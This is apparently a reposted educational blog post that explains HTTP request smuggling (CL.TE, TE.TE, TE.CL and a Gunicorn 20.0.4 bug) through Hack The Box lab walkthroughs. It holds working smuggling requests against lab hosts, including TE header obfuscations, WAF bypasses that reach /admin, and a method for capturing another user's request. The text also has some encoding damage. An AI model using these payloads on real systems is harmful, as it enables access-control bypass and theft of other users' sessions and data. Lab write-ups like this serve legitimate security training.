Deep Dive Into HTTP Request Smuggling Attacks
This is a repost of a blog post I've already created. Check out my blog here! I hope you enjoy it! Please feel free to review it and give me your feedback. Any suggestions for improvement, ideas, or new topics would be greatly appreciated.
Introduction to HTTP Request Smuggling/Desync Attacks
HTTP Request Smuggling, sometimes also referred to as Desync Attacks,?creates a desynchronization between the reverse proxy and the web server behind it. This advanced technique allows an attacker to bypass security controls such as WAFs or even compromise other users by influencing their requests.
Since HTTP is a stateless protocol, we often view HTTP requests in isolation from each other. However, HTTP/1.1 allows for the reuse of TCP sockets to send multiple requests and responses to improve performance. In such cases, the TCP stream contains multiple HTTP requests (pipelining).
To determine where one request ends and the next begins, the web server needs to know the length of each request's body. The?Content-Length?(CL) or?Transfer-Encoding?(TE) HTTP headers are used for this purpose. While the Content-Length header specifies the length of the request?body in bytes, the Transfer-Encoding header can indicate a?chunked encoding, meaning that the request body contains multiple chunks of data.
In contrast, HTTP/2 is a binary protocol that offers performance improvements over the text-based HTTP/1.1 by efficiently encoding messages and defining their body length. However, it can be converted to HTTP/1.1 by intermediaries, potentially introducing vulnerabilities...
As highlighted above, Desync or Request Smuggling Attacks are considered an advanced attack vector that exploits discrepancies between frontend and backend systems in parsing incoming HTTP requests. These attacks force a disagreement in request boundaries between the two systems, thus causing a?desynchronization.
The?frontend system?may include any intermediary system such as a?reverse proxy, web cache, or web application firewall?(WAF), while the?backend system?is typically the?web server. To fully grasp what's happening behind the scenes, it's recommended to have some understanding of TCP and HTTP protocols.
TCP Stream of HTTP requests
When HTTP wants to transmit a message, it streams the contents of the message data, in order, through an open TCP connection. TCP takes the stream of data, chops it up into chunks called segments, and transports these segments across the Internet in envelopes called IP packets. This process is all handled by the TCP/IP software; the HTTP programmer does not see any of it.
Each TCP segment is carried by an IP packet from one IP address to another. Each of these IP packets contains:
The IP header includes the source and destination IP addresses, the size, and other flags. The TCP segment header includes TCP port numbers, control flags, and numeric values used for data ordering and integrity checking.
HTTP requests and responses are transmitted using TCP.?In HTTP/1.0, each HTTP request was sent over a separate TCP socket?(at least, before the expansion of this version). However, since?HTTP/1.1, requests are typically not transmitted over separate TCP connections, but the same TCP connection is used to transmit multiple request-response pairs?(Pipelining).
This method allows for better performance since establishing TCP connections takes time. If a new HTTP request required a new TCP connection, the overhead would be much higher. Particularly, in environments where a reverse proxy sits in front of the actual web server and all requests are transmitted from the reverse proxy to the web server, the TCP socket is usually kept open and reused for all requests.
Since TCP is stream-oriented, multiple HTTP requests are sent subsequently in the same TCP stream. The TCP stream contains all HTTP requests back-to-back as there is no separator between the requests. Consider this simplified representation of a TCP stream containing two HTTP requests: a POST request in red and a GET request in green:
POST / HTTP/1.1
Host: philocyber.com
Content-Length: 5
HELLOGET /index HTTP/1.1
Host: philocyber.com
Content-Length: 23
This is another exampleGET /admin HTTP/1.1
Host: philocyber.com
Transfer-Encoding: chunked
4
HI
0
In the aforementioned example, for the reverse proxy and web server to parse the HTTP requests correctly, both need to recognize where the current request ends and the next begins. In other words, both systems must identify the request boundaries within the TCP stream. For this particular case, we specified a CL of 5 to send the first request, thereby communicating the limit of the first HTTP message between HELLO and GET.
Content-Length vs Transfer-Encoding
Furthermore, to determine the length of the current request's body, we can use HTTP headers. Specifically, the?Content-Length (CL)?and?Transfer-Encoding (TE)?headers are utilized to ascertain the length of an HTTP request's body. Let's examine how these headers indicate the request length. They work differently, so let's delve a bit more into that.
Content-Length
The CL (Content-Length) header is commonly used and you've likely encountered it many times when dealing with web applications. It specifies the byte length of the message body in the?Content-Length?HTTP header. Let's consider an example request:
""" The CL header specifies a length of 29 bytes. Therefore, all systems know that this HTTP
request contains a request body that is exactly 29 bytes long."""
POST / HTTP/1.1
Host: exmaple.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
param1=HelloWorld¶m2=Test
Transfer-Encoding
Furthermore, the TE (Transfer-Encoding) header can specify a?chunked?encoding with this directive, among others like compress, deflate, and gzip, which do not delimit the HTTP request size. Let's examine the same request using chunked encoding:
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
1d
param1=HelloWorld¶m2=Test
0
The HTTP header?Transfer-Encoding?specifies a chunked encoding. This means the body consists of chunks of data, each preceded by its size in hexadecimal on a separate line, followed by the payload of the chunk. The request concludes with a chunk of size 0, indicating the end. As illustrated, the request includes a chunk of size 0x1d, equivalent to 29 in decimal, followed by the same payload as the previous request. The request then ends with the empty chunk.
It's important to note that the sizes of the chunks and the chunks themselves are separated by the CRLF (Carriage Return Line Feed) control sequence. When displaying the CRLF characters, the request body is shown as follows:
1d\r\nparam1=HelloWorld¶m2=Test\r\n0\r\n\r\n
Transfer-Encoding over Content-Length ??
So, what happens if we have both headers in our HTTP request? There is already a standard for this that defines the behavior the app should take:
?? If a message is received with both a Transfer-Encoding header field and a Content-Length header field, the latter MUST be ignored.
For more information about this, please refer to the following:?RFC
To summarize the idea, if a request contains both a CL and TE header, the TE header has precedence, and the CL header should be ignored. HERE is when things start to get funny and magical.
Desynchronization
Request smuggling attacks exploit discrepancies between the reverse proxy and web server (I'll be repetitive with this, the only way to really understand the nature of this vulnerability, sorry). In particular, the attack forces a disagreement in the request boundaries between the two systems, thus causing a?desynchronization?which is why request smuggling attacks are sometimes also called?Desync Attacks
But what can be achieved by this desync?
Generally speaking, there is a belief that HTTP requests are viewed in isolation and therefore, different HTTP requests can’t influence each other?BUT?it's actually the opposite. If the application is being used by many users, there is a high chance to influence third-party HTTP requests by injecting malicious payloads into them.
Since multiple requests are sent over the same TCP stream as discussed above, a disagreement in request boundaries by different systems (reverse proxy and backend server) enables an attacker to achieve exactly that.
When the reverse proxy and web server disagree on the boundaries of the HTTP request (TE or CL), a discrepancy occurs behind the scenes that impacts the beginning and the subsequent request, leading to data being left in the TCP stream. One of the two systems treats this as a partial HTTP request, while the other treats it as part of the previous request. Thanks to this, an attacker may manipulate the next HTTP request of a real user, gaining access to sensitive information about the system and the user, or even making changes on behalf of another user.
Depending on the specific type of disagreement between the systems, HTTP request smuggling vulnerabilities can have different impacts, including mass exploitation of XSS, stealing of other users' data, and WAF bypasses. For more details on HTTP request smuggling attacks, have a look at?this?great blog post by James Kettle.
CL.TE Attack ??
The most common type of desync attack is the CL.TE, which basically occurs when a reverse proxy uses the Content-Length as the reference for the limit/boundary of the HTTP request (in other words, not supporting chunked encoding) while the back-end server does the same using the Transfer-Encoding. So, if the request has both headers, since the reverse proxy does not support the TE, it will (incorrectly) use and take the CL instead.
Reverse Proxy Interpretation:
Let's first have a look at the above request from the reverse proxy's perspective. Since the reverse proxy does not support chunked encoding, it uses the CL header to determine the request body's length. The CL header gives the length as 10 bytes, meaning the request body is parsed as the following?0\r\n\r\nHELLO, for example:
Reverse Proxy
POST / HTTP/1.1
Host: philocyber.com
Content-Length: 10
Transfer-Encoding: chunked
0
HELLO
So in this case, the web proxy is taking the CL including 0 and HELLO in the body
Web Server Interpretation:
The web server correctly prefers the TE header over the CL header, as defined in the RFC shown in the previous section. Since the request body in chunked encoding is terminated by the empty chunk with size?0, the web server thus parses the request body as?0\r\n\r\n, for example:
Web Server
POST / HTTP/1.1
Host: philocyber.com
Content-Length: 10
Transfer-Encoding: chunked
0
HELLO
As it was mentioned above, chunked interpret 0 as the final so HELLO will be added to the following request breaking the next HTTP method
So hey! We created our very first desync attack! It wasn't that hard, was it? But what exactly did we do before?...
Server Response nro 1
200 OK
Server Response nro 2
405 Not Allowed
Identification of the CL.TE attack
We can leverage two requests that we should send within a short period of time between each other, so we can emulate the '2 different users' interaction. We need to make our first request interfere with the second one.
In this example we can see how we successfully influence and manipulate a third party HTTP request.
Exploitation of a CL.TE attack
The exploitation to increase the severity of the attack is?hard related?to the environment/web application we are testing, so it’s dynamic and always changing. However, we can still start with some reconnaissance, like retrieving the /robots.txt information.
In this?HTB module, we face a challenge: to grab the flag value. Unfortunately, we do not have the administrator privileges required to do that, so we need to apply what we've learned in order to
Since we do not have access to the flag, we can attempt to compel the potential admin to make the change for us. By creating a desync attack where we inject the endpoint we need in order to capture what we are after, we can do the following:
In this case, the request is chunked for the web server but is processed as CL by the reverse proxy, meaning that the reverse proxy will forward the entire request as one unit, and the back-end server will interpret it as two different requests. This delivers a response for the chunked part and takes the second fake header as the start of the next incoming request. This is how we can trick the system into making arbitrary requests.
So, if we visit the /admin.php endpoint once again, we will see the unmasked flag value (don't worry about the flag, fortunately, HTB rotates the valid values).
TE.TE Attack ??
This example, as we can deduce, is about Transfer-Encoding issues and discrepancies between the reverse proxy and the web server regarding how they support this header/directive.
So how can be any problem if both support the same TE as the way to parse the HTTP requests?
Well... it’s actually more about which system follows the RSA standard, mentioned previously. There's a chance that both systems accept the TE but only one enforces the standard. So, if we manipulate the request, we can add a malicious/wrong Transfer-Encoding header, forcing one of the two systems to misinterpret the request as follows:
Identification of the TE.TE attack
DescriptionHeaderSubstring matchTransfer-Encoding:?testchunkedSpace in Header nameTransfer-Encoding :?chunkedHorizontal Tab SeparatorTransfer-Encoding:[\x09]chunkedVertical Tab SeparatorTransfer-Encoding:[\x0b]chunkedLeading spaceTransfer-Encoding:?chunked
领英推荐
To identify a TE.TE request smuggling vulnerability, we need to trick either the reverse proxy or the web server into ignoring the TE header. We can do this by slightly deviating from the specification to check whether the implementation of the two systems adheres to the specification accurately.
For example, some systems might only check for the presence of the keyword?chunked?in the TE header, while other systems require an exact match. In such cases, it is sufficient to set the TE header to?testchunked?to trick one of the two systems into ignoring the TE header and fall back to the CL header instead.
Note: The sequences?[\x09]?and?[\x0b]?are not the literal character sequences used in the obfuscation. Rather they denote the horizontal tab character (ASCII?0x09) and vertical tab character (ASCII?0x0b).
So we can leverage this attack by changing the hex code like:
If we repeat the same request we will find the HTTP Error Method message:
???It is important to mention that we need to delete the Connection header or at least change the directive to 'keep-alive'.?This particular header is crucial because it ensures that the TCP connection remains open, allowing multiple requests to be sent over a single connection. This persistent connection is a?key factor?in executing smuggling techniques, facilitating the delivery of crafted payloads intended to exploit parsing discrepancies between front-end and back-end servers.
Exploitation of the TE.TE attack
For this case, the process is pretty much the same. Once we've identified the issue and the header payload we need to construct, we can run something like this to retrieve the flag value of the challenge:
We should run this payload a few times in order to wait for the “admin” request.
GET / HTTP/1.1
Host: 94.237.55.163:40322
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (...)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9 (...)
Accept-Language: en-US,en;q=0.9
Transfer-Encoding:chunked
Connection: close
Content-Length: 46
0
GET /admin?reveal_flag=1 HTTP/1.1
HEL
O:
TE.CL Attack ??
To send the requests shown in this section, we need to manipulate the CL header. To do this in Burp Repeater, we need to instruct Burp to?not automatically update the CL header. Additionally, we need to create a?tab group?in Burp Repeater. We can add two repeater tabs to a tab group by right-clicking any repeater request tab and selecting?Add tag to group > Create tab group?(having multiple requests in a tab group gives us the option to send the requests in sequence, which is necessary to exploit the lab below).
Identification of the TE.CL attack
This type of vulnerability arises if the reverse proxy uses chunked encoding while the web server uses the CL header. Consider a request like the following:
Reverse proxy's perspective
POST / HTTP/1.1
Host: tecl.htb
Content-Length: 3
Transfer-Encoding: chunked
5
HELLO
0
Web Server
POST / HTTP/1.1
Host: tecl.htb
Content-Length: 3
Transfer-Encoding: chunked
5
HELLO
0
Exploitation and Exercise
For this case, we need to take the request to '/' and send it to the repeater twice, adding it to the same group to send the request using?Send group (single connection). The first tab will contain the payload to the path filtered by the WAF, and the second tab will capture the response from '/admin'.
GET / HTTP/1.1
Host: 94.237.58.211:47811
Content-Length: 4 # 4 because is taking as reference 32\r\n (4 bytes)
Transfer-Encoding: chunked
32
GET /admin HTTP/1.1
Host: 94.237.58.211:47811
0
We have two empty lines in each place: after the second Host and after the 0, because this is how we specify where the header ends and where the payload starts. We need to consider that when specifying the chunked size, which is 32 for this case.
GET / HTTP/1.1
Host: 94.237.58.211:47811
So, this second tab will receive the response from the chunked request we sent in the first tab.
Something?important?is that we need to switch from 'chunked' and employ the same technique we used before. To retrieve the flag value, we can instead use 'testchunked,' which will be effective."
In order to get this flag the request needs to use?testchunked?or?whateverchunked...
Vulnerable Software
So far, we've noticed request smuggling issues caused by faulty parsing or a lack of support for the TE header. However, web servers or reverse proxies can also be vulnerable to request smuggling owing to other issues that cause a request's length to be incorrectly processed...
In this lab, we will exploit a vulnerability in the HTTP Gunicorn web server that was?detailed in this blog post.?Gunicorn 20.0.4?contained a bug when encountering the?HTTP header Sec-Websocket-Key1?that fixed the request body to a length of 8 bytes, regardless of the values set for the CL and TE headers. This is a special header used in the establishment of WebSocket connections. Since the reverse proxy does not suffer from this bug, this allows us to create desynchronization between the two systems.
Identification of the Guanicorn 20.0.4
GET / HTTP/1.1
Host: gunircorn.philocyber.com
Sec-Websocket-Key1: x
Content-Length: 49
xxxxxxxxGET /404 HTTP/1.1
Host: gunircorn.philocyber.com
GET / HTTP/1.1
Host: gunircorn.philocyber.com
So, how does the back-end server process these requests? As we might expect, the reverse proxy simply uses the CL, forwarding everything to the back-end. Then, the back-end parses the Sec-WebSocket-Key1 header instead of using the CL, assuming a body of 8 bytes.
It is always 8 bytes, nothing more or less. Take a look at the?code!
(...)
elif name == "TRANSFER-ENCODING":
if value.lower() == "chunked":
chunked = True
elif name == "SEC-WEBSOCKET-KEY1":
content_length = 8
if chunked:
self.body = Body(ChunkedReader(self, self.unreader))
(...)
So the back-end server takes first 8 bytes, then a second request and response that request into the third.
GET / HTTP/1.1
Host: gunircorn.philocyber.com
Sec-Websocket-Key1: x
Content-Length: 49
xxxxxxxxGET /404 HTTP/1.1
Host: gunircorn.philocyber.com
GET / HTTP/1.1
Host: gunircorn.philocyber.com**
Exploitation of the Guanicorn 20.0.4 and challenge
GET / HTTP/1.1
Host: 94.237.56.188:40884
Content-Length: 58
Sec-Websocket-Key1: x
xxxxxxxxGET /admin HTTP/1.1
Host: 94.237.56.188:40884
GET / HTTP/1.1
Host: 94.237.56.188:40884
Exploitation of Request Smuggling
In the previous instances, we explored several types of HTTP request smuggling attacks and how to detect them. We will now explore several methods for exploiting request smuggling attacks. HTTP request smuggling vulnerabilities have a?high impact?because they allow attackers to bypass security controls such as WAFs, force other users to perform authenticated actions, capture other users' personal data, and steal their sessions in order to take over accounts and mass-exploit reflected XSS vulnerabilities.
So, we will explore three different ways to exploit this vulnerability. First, we go to WAF bypassing, then we will see how to steal user data using a POST request to write comments on a website, and... last but not least, HTB shows in this section how a massive XSS + HTTP Desync may work when combined ???? (bonus fun point).
The challenge this time is about exploiting HTTP request smuggling to force a user to enter their credentials in the comment section..
Challenge
So, we started by doing some tests just to determine which kind of HTTP Desync we are dealing with. For this case, and after a few tries, we know it is CL-TE, meaning the web proxy is taking the Content-Length to parse the request, but the backend server is taking the Transfer-Encoding instead. This means that in the same test1 (repeater group with a single connection), we get the 200 OK for the first request and 405 Not Allowed for the second one, since the backend server is appending 'HELLO' as the first line for the next request, turning GET into HELLOGET... (method not allowed).
The attack
So, after we've discovered the problem, we?NEED?to start understanding?HOW?we trigger that functionality.
I spent a lot of time trying things without first confirming them, so don't lose your hacker mindset; first understand, then attack, and finally, enjoy..
So, in order to do it as efficiently as possible, we need to think about the restrictions in place to get that 'comment request' done. For this particular case, we checked that we need a Cookie value (being authenticated) + the CSRF token of that user; otherwise, you can’t use the CSRF for an unauthenticated user either.
.
This request is quite good but not enough... I'm not sure why we need to provide the Content-Type header as the main functionality/real request in order for this to operate.
???IMPORTANT:?We can validate what kind of HTTP request smuggling we have, if we have one, without using any kind of extra headers. Just with the first line, host, TE, and CL, we are good. In order to exploit a specific functionality, we NEED to keep all the headers of the real request, just to avoid any issue with how the web applications work for that specific request/functionality.
So now, we now that the first section trigger the HTTP request smuggling (we used before to validate the issue). Now the payload should contain for this case ALSO the Content-Type + the Cookie + the csrf for that user (our user).
Finally we got the value of the admin user:
?? Something I noticed, is that I was copy pasting only the cookie value, so in my case I was trying to access to the admin panel using “Cookie: PHPSESSID:fd1dt4khy36dthmc” and I should use?“Cookie: session=fd1dt4khy36dthmc”?(I know, is silly but worth to tell you).
JUST BE CAREFUL WITH THESE DETAILS
Request Smuggling Tools & Prevention
A useful tool to help us in the identification and exploitation of HTTP request smuggling vulnerabilities is the Burp Extension?HTTP Request Smuggler. We can install it from the Burp Extensions Store in the?Extensions?tab. Go to?BApp Store?and install the extension from there.
?? This section has good automated configurations to search for this vulnerability in a more automated way. It's worth giving it a look, but I don't think it's worth it to keep adding more information about automation in this post.
Mitigations and recommended steps
Preventing HTTP request smuggling attacks generally is no easy task, as the issues causing request smuggling vulnerabilities often reside within the web server software itself. Thus, they cannot be prevented from within the web application. Furthermore, web application developers might be unaware of underlying quirks in the web server, which might lead to HTTP request smuggling vulnerabilities, such that they have no chance of preventing them. However, there are some general recommendations we can follow when configuring our deployment setup to ensure that the risk of HTTP request smuggling vulnerabilities is as minimal as possible, or at least the impact is reduced:
Most of this examples/exercises were extracted from the 'HTTP Attacks' (CRLF Injection, HTTP Desync and HTTP/2 Downgrading) HTB module. Path:?Senior Web Penetration Tester Exam:?Certified Web Exploitation Expert (CWEE) Difficulty:?Hard Tier:?III Module Author:?vautia